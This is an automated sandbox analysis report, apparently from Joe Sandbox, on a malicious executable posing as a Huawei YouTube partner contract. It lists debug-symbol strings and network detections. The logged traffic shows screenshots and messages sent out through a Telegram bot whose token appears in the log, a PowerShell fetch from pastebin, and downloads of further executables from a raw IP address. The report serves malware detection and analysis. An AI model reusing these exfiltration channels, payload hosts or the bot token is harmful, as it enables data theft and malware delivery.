Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249194705.000002B7E9380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248294715.000002B7E8F41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249474322.000002B7E9581000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249525013.000002B7E95A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251506804.000002B7EA1F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251529668.000002B7EA200000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.NameResolution.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249010025.000002B7E9301000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249032962.000002B7E9310000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.pdbhP source: powershell.exe, 00000004.00000002.2198121281.00000224016FA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.pdb source: powershell.exe, 00000004.00000002.2198121281.00000224016FA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Net.Quic.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251604593.000002B7EA231000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251630855.000002B7EA250000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248367252.000002B7E8F70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248436550.000002B7E8FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246009062.00000277513F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246783735.000002B7E5F50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245924097.00000277513D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245901626.00000277513C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/Release/net8.0-windows/Microsoft.Win32.SystemEvents.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250920794.000002B7E9E81000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251066988.000002B7E9F90000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251180696.000002B7E9FD1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251365686.000002B7EA1A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251136685.000002B7E9FB0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251111684.000002B7E9FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250803085.000002B7E9E20000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250777948.000002B7E9E11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Drawing.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250876793.000002B7E9E70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250853000.000002B7E9E51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248611872.000002B7E90A0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248658900.000002B7E90C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.DriveInfo\Release\net8.0-windows\System.IO.FileSystem.DriveInfo.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245966712.00000277513E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246764040.000002B7E5F40000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251680767.000002B7EA330000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3252368079.000002B7EA9E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245701128.0000027751321000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245657663.00000277512F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245605245.00000277512E0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245583929.00000277512D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248471233.000002B7E8FD0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248337268.000002B7E8F51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Windows.Forms.Primitives/Release/net8.0/System.Windows.Forms.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253245076.000002B7EB261000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253056950.000002B7EB090000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249143432.000002B7E9341000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249169651.000002B7E9360000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249474322.000002B7E9581000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249525013.000002B7E95A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246850829.000002B7E5F90000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246824918.000002B7E5F71000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141674897.00007FF77A3F8000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244830292.000002774F971000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249770533.000002B7E9660000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248367252.000002B7E8F70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248436550.000002B7E8FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256Y$ source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248122759.000002B7E8E40000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246893106.000002B7E6011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.NonGeneric.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251410435.000002B7EA1B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251433635.000002B7EA1C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245701128.0000027751321000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245657663.00000277512F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248708035.000002B7E90E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248730109.000002B7E90F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Memory.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251506804.000002B7EA1F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251529668.000002B7EA200000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248496144.000002B7E8FF0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244705711.000002774F921000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249747447.000002B7E9640000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249726194.000002B7E9631000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249101985.000002B7E9330000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249078164.000002B7E9321000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.Windows.Core/Release/net8.0/System.Private.Windows.Core.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251295916.000002B7EA0C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251204268.000002B7E9FE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248518064.000002B7E9000000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248575013.000002B7E9051000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256}yx source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251180696.000002B7E9FD1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251365686.000002B7EA1A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Cryptography.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248833493.000002B7E91C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248750883.000002B7E9100000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245924097.00000277513D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245901626.00000277513C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/Release/net8.0/System.Private.DataContractSerialization.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248122759.000002B7E8E40000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246893106.000002B7E6011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141507633.00007FF77A21D000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249567499.000002B7E95B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249594148.000002B7E95C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256b' source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248367252.000002B7E8F70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248436550.000002B7E8FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245605245.00000277512E0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245583929.00000277512D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249620096.000002B7E95D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249669770.000002B7E9601000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Windows.Forms/Release/net8.0/System.Windows.Forms.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251680767.000002B7EA330000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3252368079.000002B7EA9E1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA256M source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249101985.000002B7E9330000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249078164.000002B7E9321000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Console.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246850829.000002B7E5F90000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246824918.000002B7E5F71000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248897242.000002B7E9280000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248955580.000002B7E92C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248122759.000002B7E8E40000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246893106.000002B7E6011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245331226.0000027751290000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244925040.000002774F991000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251180696.000002B7E9FD1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251365686.000002B7EA1A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.RegularExpressions\Release\net8.0\System.Text.RegularExpressions.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250422129.000002B7E9C80000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250523289.000002B7E9CE1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Drawing.Primitives\Release\net8.0-windows\System.Drawing.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250876793.000002B7E9E70000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250853000.000002B7E9E51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245786403.0000027751380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245744128.0000027751351000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248225564.000002B7E8F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248179022.000002B7E8EF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256iEc source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248708035.000002B7E90E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248730109.000002B7E90F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250716435.000002B7E9DC1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250642336.000002B7E9D70000.00000004.10000000.00040000.00000000.sdmp

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.6:49792 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:50002 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:50001 -> 149.154.167.220:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Uses the Telegram API (likely for C&C communication)
Source: unknownDNS query: name: api.telegram.org
Source: global trafficHTTP traffic detected: POST /bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendPhoto?chat_id=-4642404996 HTTP/1.1Host: api.telegram.orgContent-Type: multipart/form-data; boundary="e4a0611f-b7c4-4266-9d16-9a0547683bdd"Content-Length: 694321
Source: global trafficHTTP traffic detected: POST /bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendMessage HTTP/1.1Host: api.telegram.orgContent-Type: application/x-www-form-urlencodedContent-Length: 253
Source: global trafficHTTP traffic detected: POST /bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendMessage HTTP/1.1Host: api.telegram.orgContent-Type: application/x-www-form-urlencodedContent-Length: 252
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global trafficHTTP traffic detected: GET /Team/BILLI.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /Team/32cv.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /Team/BILLI.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /Team/32cv.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /Team/32cv.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /Team/BILLI.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /Team/32cv.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /Team/BILLI.exe HTTP/1.1Host: 89.23.97.214
Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: ip-api.com
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49778 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49785 -> 208.95.112.1:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49825 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49824 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49960 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49994 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49995 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49998 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49999 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49961 -> 89.23.97.214:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49706 -> 172.67.19.24:443
Source: global trafficHTTP traffic detected: GET /raw/WHKzW2nr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.214
